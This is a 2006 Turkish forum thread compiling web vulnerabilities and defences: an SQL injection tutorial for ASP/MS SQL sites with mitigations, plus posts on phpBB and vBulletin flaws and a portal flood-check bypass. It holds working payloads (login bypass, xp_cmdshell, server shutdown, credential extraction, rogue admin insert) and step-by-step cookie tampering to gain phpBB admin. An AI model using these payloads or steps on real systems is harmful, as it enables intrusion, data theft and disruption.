IRCForumları - IRC ve mIRC Kullanıcılarının Buluşma Noktası
  reklamver

Etiketlenen Kullanıcılar

Yeni Konu aç Cevapla
 
LinkBack Seçenekler Stil
Alt 01 Mart 2006, 05:00   #1
Çevrimdışı
Kullanıcıların profil bilgileri misafirlere kapatılmıştır.
IF Ticaret Sayısı: (0)
IF Ticaret Yüzdesi:(%)
Web Site Açıkları Ve Korunma Yolları




Tek başlık altında site açıkları ve korunma yollarını vericem arkadaşlar.Mümkün olduğunca sık güncelleyeceğim.Umarım faydası olur,takıldığınız konular olursa bu başlık altında yazarsınız yardımcı olmaya çalışırım.Cesitli sitelerden alintilardan olusmaktadir bilginiz olsun..


May 7, 2005, 3:42 pm
SQL Enjeksiyon Saldırıları & Korunma Yolları
Yazar Fuzbing in Vurnerabilities
Rating: 0/5 Votes : 0
Dünyanın her tarafında, kullanıcılarına; kredi kartı numaraları, kullanıcı bilgileri gibi gizli kalması gereken bilgilerin, ürünlere ve siparişlere ait verilerin saklandığı uç-arka veri depolarıyla hizmet veren web siteleri bulunmaktadır. Ve genel olarak, web sitelerindeki form aracılığı ile alınan girdi ile veritabanındaki bilgiler filtrelendikten sonra sonucu kullanıcıya gönderen bu tür sistemlerde Yapısal Sorgulama Dili (Structured Query Language - SQL) kullanılmaktadır. Uygulama içerisinde kullanılacak parametre değerleri alınırken kullanılan formun SQL Deyimini yeniden yapılandırabilecek bazı özel karakterlere izin vermesiyle güvenlik problemleri ortaya çıkmaktadır.


Bu güvenlik problemleri kullanılarak bir uygulamanın arkasında, bu uygulamaya destek veren veri tabanı üzerindeki bütün bilgilere ulaşılabilir veya bilgiler üzerinde değişiklik yapılabilir. Veya veri tabanı sisteminin komutları kullanılarak kullanılan sunucular üzerinde uygulama harici istenen işlemler de yapılabilir. Bu problemlerden korunmak için de uygulama girdilerini bu tür karakterlere karşı kontrol eden fonksiyonların kullanılmalı ve geniş çaplı uygulamaların bu güvenlik açıklarını taşıyıp taşımadığını anlamak için güvenlik denetimine tabi tutulmalıdır..

İlgilendiren Sektör ve Şirketler:

* Özel olarak geliştirilmiş uygulamalar kullanan tüm kurum ve kuruluşlar
* Internet / Intranet üzerinde uygulama geliştiren kuruluşlar

1. Bir Uygulama Güvenliği Problemi - "Yapısal Sorgulama Dili Kullanımı"

Yapısal Sorgulama Dili SQL'in uygulamalarda kullanımına örnek vermek gerekirse;

SELECT Name, Address FROM Users WHERE UserID = '2081'

Şeklindeki SQL Deyimi "Users" adlı tablodan "2081" ürün ID si ile veritabanına kayıtlı olan kişiye ait olan isim ve adres bilgilerini dönecektir. Bu noktada muhtemel zayıflık, kullanılan formun SQL Deyimini yeniden yapılandırabilecek bazı özel karakterlere izin vermesiyle ortaya çıkmaktadır. Çözümü ise girdilerden bu özel karakterlerin filtrelenmesini sağlayan fonksiyonlardır.

Hızla gelişen internet teknolojileri karşısında yeni pazarda geç olmadan yerini almak isteyen müşterilerine daha kısa sürede daha kullanışlı ve ucuz çözümler sunmak zorunda olan uygulama geliştiriciler bu süreçte güvenlik gibi önemli bir faktörü ikinci plana atmaktadırlar.

Giderek yaygınlaşan ve medyanın haber potansiyelini oluşturan; çalınan kredi kartı numaraları, yer altı sitelerde dağıtılan müşteri bilgileri, şirket projeleri - yazışmaları yaklaşan tehlikenin habercisi olmakla beraber halen bu tür kayıpların yaratabileceği maddi sonuçları kavrayamayan ve hala "az maliyetle kurtarılan güvenlik projeleri" 'yle övünen yöneticilere uyarı niteliği taşımaktadır. Öyleki -herzaman bir adım önde olmayı amaçlayan- saldırganlar güvenliğin en üst seviyede olması beklenen devlet siteleri de dahil olmak üzere pek çok sisteme yönelik saldırılarına da ara vermeksizin devam etmektedirler.

Maddi ve manevi değere sahip şirketinizi bir anlamda iş ortaklarını olan uygulama geliştiricilerin hazırladıkları uygulama ürünlerine emanet edildiğini düşünürsek, "uygulamalarınıza ne kadar güvenirsiniz?" gibi bir soruya verilecek cevap büyük önem taşımaktadır.

Böyle bir ortamda uygun güvenlik çözümü için ayrılmış bütçe bir lüks değil her an yapılabilecek bir saldırıda şirketin uğrayacağı zararı ortadan kaldırmak için alınması gereken önlem niteliği taşımaktadır.

2. Örnek Saldırılar - "Yapılacak Hamleleri Önceden Tahmin Edebilmek..."

Güvenlikte sıkça kullanılan bir deyim; "Saldırganlardan korunabilmek için onlar gibi düşünmelisiniz!..". Saldırganın sisteminize girmek için kullanabileceği yöntemleri bilmek bu saldırılardan korunabilmek için alınan önlemleri daha sağlıklı kılacaktır.

Örneklerde kullanacağımız hedef ; Microsoft® Internet Information Server™' dan Microsoft® SQL Server™'a varsayılan sistem hesabı'ndan (sa) bağlanan ASP tabanlı bir kullanıcı hesabı yöneticisi olacak.
Form.asp : Username ve Password girdisini alan form.Solda...
Login.asp : Veritabanı ile bağlantıya geçen ve girdinin doğruluğunu kontrol eden ASP kodu.

2.1. Kötü Amaçlı (') İmleçleri Yardımıyla İzinsiz Giriş Sağlama:

Kullanıcı "Username" & "Password" verisini Login.asp ye yolladıktan sonra .asp kodunun yapacağı iş verilen yoldaki veritabanı ile bağlantı kurup ilgili tabloda Username ve Password sütünlarında gönderilen verinin doğruluğunu kontrol etmek olacaktır. Bu işlem sonucunda eğer sonuç olumluysa kullanıcıya; "Giriş Yapıldı" olumsuzsa; "Geçersiz Kullanıcıadı & Şifre" mesajı verilecektir.

Örnekleyecek olursak;

Username : ilkay
Password : 2081

Şeklindeki kullanıcı girdisi aşağıdaki SQL Deyimini oluşturacaktır;

SELECT count(*) FROM Users WHERE Username = 'ilkay' AND Password = '2081'

İlk bakışta sorun olmayan bir SQL Deyimi... Fakat saldırganın;

Username : ilkay
Password : ' OR 1=1--

Şeklindeki girdilerle oluşturacağı SQL Deyimi ise;

SELECT count(*) FROM Users WHERE Username = 'ilkay' AND Password = '' OR 1=1 --'

Olacaktır ki, bu durumda girişin sağlanması için şart "ilkay" kullanıcı adına ait şifrenin hiçbirşey* olması veya ikinci bir opsiyon olarak 1=1 eşitliğinin sağlanmasıdır.

* Hiçbişey = Boşluk

Sonuç : 1=1 eşitliği sağlandığına göre saldırı başarıyla sonuçlanacak ve "Giriş Yapıldı" mesajı verilecektir.

Not : Microsoft® SQL Server™ "--" imlecinden sonra gelen yersiz kullanılmış tırnak işaretlerini göz ardı edecektir. İlk bakışta basit gibi görünen ve sadece SQL Server'a ait olan bu özellik ilerde örneklerden de anlaşılacağı üzere saldırgana büyük kolaylık sağlayacaktır..

2.2. Uzaktan Çalıştırılması Mümkün Olan Prosedürler:

MS SQL Server'a varsayılan sistem hesabından yaptığımız bağlantı SQL Enjeksiyon saldırısında muhtemel saldırgana sunucuda saklanan prosedürleri çalıştırabilmesi için gerekli hakları tanıyacaktır. Saldırganın kullanabileceği prosedürlerden bir tanesi; "master..xp_cmdshell" olabilir.

Username : ilkay
Password : '; EXEC master..xp_cmdshell 'dir c:'--

Girdileriyle oluşacak SQL Deyimi;

SELECT count(*) FROM Users WHERE Username = 'ilkay' AND Password = ''; EXEC master..xp_cmdshell 'dir c:'--'

Sonuç : SQL Server Kullanıcıadı ve Şifreyi bulunduran sütunları arayacaktır bulamadığı için "Yanlış Kullanıcıadı & Şifre" mesajını verecektir fakat bu arada arka planda "dir c:" komutunu çalıştıracak ve saldırgan C sürücüsünün içeriğine ulaşacaktır.

2.3. SQL Server Hedef Alınarak Yapılan Saldırılar:

Yönetici haklarına sahip saldırgan silme,ekleme,değiştirme...vb gibi komutları rahatlıkla çalıştırabilecektir.

SHUTDOWN WITH NOWAIT SQL Server'ın kritik komutlarından bir tanesidir. Komutla beraber SQL Server görevine son verir.

Username : '; SHUTDOWN WITH NOWAIT--
Password : [Boş]

Bu girdilerle oluşturulan SQL Deyimi;

SELECT Username FROM Users WHERE Username=''; SHUTDOWN WITH NOWAIT; --' AND Password=''

Sonuç : SQL Server kullanıcıadının bulunamadığı mesajını verecektir. Fakat bununla beraber arka planda diğer komutu çalıştırdığı için SQL Server kapanacaktır.

2.4. ODBC Hatalarından Faydalanarak Yapılan Saldırılar:

SQL Server'ın verdiği hatalardan faydalanarak veritabanındaki neredeyse tüm bilgilere ulaşmak mümkündür.

Hedef; [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...] şeklinde ürün ID leri ile çalışan ASP tabanlı bir websitesi.

Saldırı SQL Server'ın integer ve string cinsinden verileri birlikte gönderememesinden faydalınarak yapılabilir;

Gönderilen '10' sayısına veritabanından herhangi bir string eklenir.

[Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...] UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

Not: "INFORMATION_SCHEMA.TABLES" sistem tablosu, sistemde bulunan diğer tüm tablolar hakkında bilgi içerir. Deyimde kullanılan "TABLE_NAME" de yine tüm tablo isimlerini içerir.

Oluşacak SQL Deyimi;

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES

 
Alıntı ile Cevapla

IRCForumlari.NET Reklamlar
sohbet odaları eglen sohbet reklamver
Alt 01 Mart 2006, 05:03   #2
Çevrimdışı
Kullanıcıların profil bilgileri misafirlere kapatılmıştır.
IF Ticaret Sayısı: (0)
IF Ticaret Yüzdesi:(%)



String -> Integer dönüşümünü yapamayan SQL Server aşağıdaki hatayı verecektir.

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Table1' to a column of data type int.
/Default.asp, line 5

Hata, saldırgana "Table1" olarak bulduğu cevabı integer a çeviremediğini (dolayısıyla veritabanındaki ilk tablo adının "Table1" olduğunu) belirtmektedir. Saldırgan diğer tabloların adını aşağıdaki şekilde öğrenebilir...

[Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...] UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('Table1')--

Veya doğrudan LIKE komutunu kullanarak aradığı şeye daha kolay yoldan ulaşabilir;

[Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...] UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25Login%25'--

SQL Server'ın vereceği hata;

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Admin_Login' to a column of data type int.
/Default.asp, line 5

Admin_Login adında bir tablo olduğunu öğrenen saldırgan muhtemelen tablodaki ilk kullanıcıadı ve şifreye ulaşmak isteyecektir. İzleyebileceği yol ise;

[Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...] UNION SELECT TOP 1 Username FROM Admin_Login--

Hata;

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ilkay' to a column of data type int.
/Default.asp, line 5

Bu şekilde "admin" kullanıcıadının varlığını doğrulayan saldırganın şifreyi ele geçirmek için kullanacağı girdi;

[Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...] UNION SELECT TOP 1 Password FROM Admin_Login WHERE Username='ilkay'--

Hata;

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '2081' to a column of data type int.
/Default.asp, line 5

Sonuç :
Username : ilkay
Password : 2081

2.5. Veritabanına Ekleme Yapma veya Veri Düzenleme:
Kullanıcıadı ve şifre bilgisine ulaşan muhtemel saldırgan benzer yöntemleri ve UPDATE,INSERT komutlarını kullanarak şifreyi değiştirebilir veya daha temizi başka bir kullanıcı hesabı açabilir...

[Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...] UPDATE 'Admin_Login' SET 'Password' = 'NewPwd' WHERE Username='ilkay'--

Yeni bir kullanıcı hesabı için;

[Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...] INSERT INTO 'Admin_Login' ('UserID', 'Username', 'Password', 'Details') VALUES (666,'Desperate_Cry','2081','N/A')--



3. Nasıl Korunmalı? - "Aksi Doğrulanıncaya Kadar Tüm Kullanıcı Girdileri Kötüdür..."

Gelebilecek SQL Enjeksiyon saldırılarından korunabilmek için alınan önlemlerde temel alınması geren nokta... "Aksi doğrulanıncaya kadar tüm kullanıcı girdileri kötüdür!".

3.1. Kullanıcı Haklarının Sınırlandırılması

Yaygın olarak yapılan hata; Web Server dan SQL Server a yapılan bağlantılarda varsayılan sistem hesabı kullanılması... Bu şekilde yönetici haklarına sahip olan saldırgan örneklerde de görülebileceği üzere isteği komutu çalıştırıp istediği ekleme,silme,düzeltme eylemini gerçekleştirebilecektir. Bunu yerine yapılması gereken yeni bir kullanıcı hesabı oluşturup kullanıcının çalıştırabileceği komutları sınırlandırmak olacaktır.

Mesela sitenizden ürünlerinizin incelenmesine ve bunlar arasından sipariş verilmesine izin verecekseniz, "web_user" gibi bir kullanıcı adı oluşturup ürünleri incelemek için; ürünler sütununda sadece "SELECT" kullanımına ve siparişleri için; siparişler sütununda sadece "INSERT" kullanımına izin vermeniz uygun olacaktır.

3.2. Girdilerde Tırnak İmleçlerinin (') Kötü Amaçlı Kullanımının Engellenmesi

Yaygın SQL Enjeksiyon saldırıları SQL deyimlerinin girdilerdeki gereksiz (') tırnak işaretleri yardımıyla yeniden oluşturulması sayesinde yapılır.

Küçük bir filtreleme fonksiyonu veya tek tırnağı çift tırnağa çeviren bir fonksiyon muhtemel bir saldırıyı engellmek için yeterli olabilir.

ASP Kullanarak girdileri kontrol ederek değiştiren bir fonksiyon kolaylıkla yazılabilir;

<%
Function ReplaceQuotes(strWords)
ReplaceQuotes = Replace(strWords,”’”,”””)
End Function
%>

Bu fonksiyonu baştaki örnekte kullanırsak;

SELECT count(*) FROM Users WHERE Username='ilkay' AND Password='' OR 1=1 --'

şeklinde olan deyim...

SELECT count(*) FROM Users WHERE Username='ilkay' AND Password='" OR 1=1 --'

'e dönüşecektir.

3.3. Form Girdilerinden Gereksiz Karakterlerin Elenmesi

SQL Enjeksiyon saldırıları genelde ";, --,SELECT, INSERT ve xp_" gibi karakterlerin-kelimelerin kullanılmasıyla yapıldığı için gönderilecek girdinin önce bir filtreleme fonksiyonundan geçirilmesi muhtemel zayıflığı engelleyebilir.Örneğin kullanıcıdan E - Mail adresini girmesi isteniyorsa harfler ve sayıların yanında sadece " @,-,_,." karakterlerinin kullanılmasına izin verilmelidir.

Ve sunucuda saklanan xp_cmdshell ve xp_grantlogin gibi genel prosedürler,C/C++ tabanlı DLL ler, kullanıcı taraflı fonksiyonlar...vb, izole edilmiş bir sunucuya taşınmalıdır. Bazı zararlı kelime-harfleri filteleyen ASP fonksiyonu aşağıda örneklenmiştir;

<%
Function FilterBadWords(strWords)
dim BadWords
dim NewWords
BadWords = array("SELECT", "DROP", ";", "--", "INSERT", "DELETE", "xp_"')
NewWords = strWords
for i = 0 to uBound(BadWords)
NewWords = Replace(NewWords, BadWords(i), ""')
Next
FilterBadWords = NewWords
End Function
%>

Tırnak değiştirme fonksiyonu ve filtreleme fonksiyonu beraber kullanılırsa;

SELECT Username FROM Users WHERE Usename=''; EXEC master..xp_cmdshell 'dir c'; --' AND Password=''

Şeklindeki SQL Deyimi...

SELECT Username FROM Users WHERE Usename='" EXEC master.. cmdshell "dir c:" ' AND Password=''

e dönüşecektir ki bu da herhangi bir kayıt bulumadığı hatasını vermekten öteye gitmeyecektir.

Bu fonksiyonu kullanıcıdan gelen bütün girdilere, adres satırı ifadelerine ve çerezlerden gelen tüm veriye uygulamamız gelebilecek saldırının önüne geçecektir.

3.4. Girdi Uzunluğunun Sınırlandırılması

Veritabanındaki ayrılan alanın uzunluğu 10 karakterlikse, formunuzda bu alan için 50 karakter sığan bir text kutusuna sahip olmanız sakıncalı olabilir. Ve mümkün olduğu kadar girdi uzunluklarını kısa tutmak muhtemel saldırıyı engellemek için önlem sayılabilir.

3.5. Girdi Cinsinin Kontrol Edilmesi

Formunuzdan girilen verinin istediğiniz türden bir veri olup olmadığını kontrol eden bir fonksiyon kötü amaçlı kullanımlarda saldırganın kullanabileceği harf/sayı seçeneğini kısıtlayacaktır. Mesela, eğer Ürün ID si için formunuzdan girdi alıyorsanız girdinin sayısal bir ifade olup olmadığını kontrol eden bir fonksiyon fayda sağlayacaktır.

3.6. Girdi Cinsinin Kontrol Edilmesi

Formunuz aracılığı ile topladığınız verileri yollarken mutlaka "POST" metodunu kullanın ki kullanıcılarınız adres çubuğunda girdikleri verilerle beraber form değerlerini gördüklerinde akıllarına farklı fikirler gelmesin.

4. Son Söz - "Herzaman bir adım önde!"

Aldığınız güvenlik önlemleri veya (en iyi ihtimalle) yazıp da kullanmayı bir alışkanlık haline getiremediğiniz güvenlik politikaları sizi güvenlik problemlerine karşı koruyabilir mi? Eğer güvenlik ile ilgili problemleri yönetmeyi süreç temelli bir güvenlik bilinci içerisinde ele almıyorsanız hiçbir güvenlik ürünü, bir güvenlik kaybına uğramanızı engelleyemez.

Bilgi sistemleri altyapınızı taşıdıkları güvenlik zaaflarına karşı düzenli olarak kontrol ettirmek, risklerinizi takip etmek, doğru teknolojiyi doğru yerde ve doğru şekilde kullanmanızı sağlayacak güvenlik politikalarınızı oluşturup güvenlik probleminizi sürekli yönetebilecek olgunluğa ulaşmak hedeflenmelidir. Bilgi sistemlerinin önemli bir kısmını oluşturan uygulamaların taşıyabileceği güvenlik sorunları uzun süredir ihmal edilmelerinden dolayı, günümüzün en popüler sistem sızma noktalarını teşkil etmektedirler. Bu nedenle uygulama güvenliğine ilişkin gereken önemi vermeniz, güvenlik denetimi yaptırmanız ve kurumunuzun bilgi güvenliği yönetim sistemini oluşturmaya bir yerinden başlamanızı öneriyoruz.

 
Alıntı ile Cevapla

Alt 01 Mart 2006, 05:04   #3
Çevrimdışı
Kullanıcıların profil bilgileri misafirlere kapatılmıştır.
IF Ticaret Sayısı: (0)
IF Ticaret Yüzdesi:(%)



PHPBB AÇIĞI!

Konrol etmedim Burada Varmı ama

Açık 2.x - 2.0.12 arası versiyonlarda geçerli. Bu açık sayesinde üyesi olduğunuz PhpBB forumunda admin olabilirsiniz. Bunun için bir 'Cookie Editor' programına ihtiyacınız olacak.

Diyelimki A sitesinin forumuna üyesiniz. Cookie Editor'ü açıp A sitesinin olduğu dizine çift tıklıyoruz.

Normalde "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0 %3A% 22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B% 7D" şeklinde data çıkar karşımıza.

Biz bunu "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1 %3Bs %3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D" olarak değiştirip save ederiz.

Ardından Ctrl+Alt+Del yapıp Taskbar'dan 'iexplorer.exe' uygulamasını kapatırız. Tekrar I.Explorer'ı açıp üyesi olduğunuz foruma girdiğinizde admin olduğunuzu görüceksiniz. Kolay gelsin..

P.S: Bu açık exploit şekliyle public olmuştur. Ayrıntılı bilgi için bakınız: [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]

 
Alıntı ile Cevapla

Alt 01 Mart 2006, 05:07   #4
Çevrimdışı
Kullanıcıların profil bilgileri misafirlere kapatılmıştır.
IF Ticaret Sayısı: (0)
IF Ticaret Yüzdesi:(%)



PHPBB nin SON AÇIĞI!
hpBB yazılımının bir XSS (cross-site scripting) açığından etkilendiği rapor edildi. Problem kullanıcı tarafından girilen verilerin düzgün olarak filtrelenmemesinden kaynaklanıyor.

Bir saldırgan bu açıktan yararlanarak istediği script kodlarını çalıştırabiliyor. Bu sayede cookie tabanlı kimlik tanılama bilgileri çalınabiliyor.
örnek:
[Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]

Çözüm:
Henüz bir yama çıkmadı.

kaynak: [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]

Etkilenen Sistemler

Etkilenenler:
phpBB Group phpBB 2.0 .0
phpBB Group phpBB 2.0 RC4
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache for Windows 1.3.9
phpBB Group phpBB 2.0 RC3
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache for Windows 1.3.9
phpBB Group phpBB 2.0 RC2
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache for Windows 1.3.9
phpBB Group phpBB 2.0 RC1
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache for Windows 1.3.9
phpBB Group phpBB 2.0 Beta 1
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache for Windows 1.3.9
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.3
phpBB Group phpBB 2.0.4
phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.6 d
phpBB Group phpBB 2.0.6 c
phpBB Group phpBB 2.0.6
phpBB Group phpBB 2.0.7 a
phpBB Group phpBB 2.0.7
phpBB Group phpBB 2.0.8 a
phpBB Group phpBB 2.0.8
phpBB Group phpBB 2.0.9
phpBB Group phpBB 2.0.10
phpBB Group phpBB 2.0.11
phpBB Group phpBB 2.0.12
phpBB Group phpBB 2.0.13
phpBB Group phpBB 2.0.14

 
Alıntı ile Cevapla

Alt 01 Mart 2006, 05:08   #5
Çevrimdışı
Kullanıcıların profil bilgileri misafirlere kapatılmıştır.
IF Ticaret Sayısı: (0)
IF Ticaret Yüzdesi:(%)



VBULLETIN AÇIK 1

VBulletin'de kullanıcı tarafından sağlanan veriler doğru olarak kontrol edilmediği için bir güvenlik açığı söz konusu.

members2.php'deki bir değişkene geçersiz bir değer sağlayarak saldırganın belirlediği HTML kodunun çalıştırılacağı bir hata sayfası yaratması mümkün oluyor.

Bu açıktan yararlanarak çerez-tabanlı (cookie) kimlik tanılama bilgileri çalınabilir. Saldırgan daha sonra bu bilgi ile kullanıcının oturumunu eline geçirebilir.

Çözüm:
Bir yama çıkana kadar geçici çözüm olarak aşağıdaki satırı member2.php'de 304. satırdan hemen sonra ekleyin:
If (IsSet ($perpage) && $perpage != Is_Int($perpage)) { $perpage = IntVal ($perpage); }

kaynak: [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]

Açığı gerçekleştirme

Yerel:
Hayır

Uzaktan:
Evet
Etkilenen Sistemler

Etkilenenler:
Jelsoft vBulletin 2.0
Jelsoft vBulletin 2.0.1
Jelsoft vBulletin 2.0.2
Jelsoft vBulletin 2.2 .0
- Apache Software Foundation Apache 1.3.17
- Apache Software Foundation Apache 1.3.17 win32
- Apache Software Foundation Apache 1.3.19
- Apache Software Foundation Apache 1.3.19 win32
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.20 win32
- Apache Software Foundation Apache 1.3.22
- Microsoft IIS 3.0
- Microsoft IIS 4.0
- Microsoft IIS 5.0
Jelsoft vBulletin 2.2.1
Jelsoft vBulletin 2.2.2
Jelsoft vBulletin 2.2.3
Jelsoft vBulletin 2.2.4
Jelsoft vBulletin 2.2.5
Jelsoft vBulletin 2.2.6
Jelsoft vBulletin 2.2.7
Jelsoft vBulletin 2.2.8

 
Alıntı ile Cevapla

Alt 01 Mart 2006, 05:09   #6
Çevrimdışı
Kullanıcıların profil bilgileri misafirlere kapatılmıştır.
IF Ticaret Sayısı: (0)
IF Ticaret Yüzdesi:(%)



Vbulletin Açığı

Vbulletin forumun kolayca dbsini indirebilirsiniz

[Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]

eğer lisanslıysa musteri kodunu bilmeniz gerekiyor
eğer lisanssız ise direk indirebiliyosunuz

 
Alıntı ile Cevapla

Alt 01 Mart 2006, 05:10   #7
Çevrimdışı
Kullanıcıların profil bilgileri misafirlere kapatılmıştır.
IF Ticaret Sayısı: (0)
IF Ticaret Yüzdesi:(%)



alekosportal da açık!!

açık türü: flood
korunma yolu: şimdilik Yok ama ayrıca ASP bilginiz varsa halledebilirsiniz.

açıklama: alekosportaldaki flood koruması şu şekilde çalışmakta:

pass fonksiyonu hidden tipi forma yerleştirilir daha sonra;
______
<%=pass%>[Güvenlik Kodu] = |_____| (text tipi form)
buraya kodu yazdırır v giriş dosyasında

gkodu ve gkodut yer alır ve text ile hidden tipli formlar tanımlanmır bunlar aynı ise işlem devam eder,değilse redirect ile hata sayfasına yönlendirir.
yani?? = yanisi şu adam iki text kutusu ve diğer formları hazırlar text kutularına (atıyorum) 123 123 değerlerini atar sistem ikiside aynı olduğu için hata vermez.böylece pekçok oturum açılır,üye eklenir.


uyarı amaçlıdır.bu açığı kullananlardan bn sorumlu değilim.

 
Alıntı ile Cevapla

Alt 01 Mart 2006, 05:12   #8
Çevrimdışı
Kullanıcıların profil bilgileri misafirlere kapatılmıştır.
IF Ticaret Sayısı: (0)
IF Ticaret Yüzdesi:(%)



Elimden geldiğince çeşitli sitelerden derlemeler yapıp bu bölümü mümkün olduğu kadar güncel tutmaya calisacağım.Hatalarim olursa beni mazur görün.Anlayısınız icin simdiden tesekkür ederim..

 
Alıntı ile Cevapla

Cevapla

Etiketler
aciklari, açıkları, korunma, site, ve, web, yollari, yolları


Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)
 

Yetkileriniz
Konu Acma Yetkiniz Yok
Cevap Yazma Yetkiniz Yok
Eklenti Yükleme Yetkiniz Yok
Mesajınızı Değiştirme Yetkiniz Yok

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodu Kapalı
Trackbacks are Kapalı
Pingbacks are Açık
Refbacks are Açık


Benzer Konular
Konu Konuyu Başlatan Forum Cevaplar Son Mesaj
Hazımsızlıktan Korunma Yolları Elysian Sağlık Köşesi 0 23 Mart 2014 12:06
VB'de Virüs & Korunma Yolları yoSun Visual Basic 0 13 Haziran 2011 22:55
HPV'den Korunma Yolları Frozen Erkek Sağlığı 0 20 Mart 2011 19:29
Facebook'ta korunma yolları! Slipknot Ağ, Network ve Networking 1 16 Ağustos 2010 18:09
Erozyon ve Korunma Yolları YapraK Ödev ve Tezler 0 29 Nisan 2009 17:28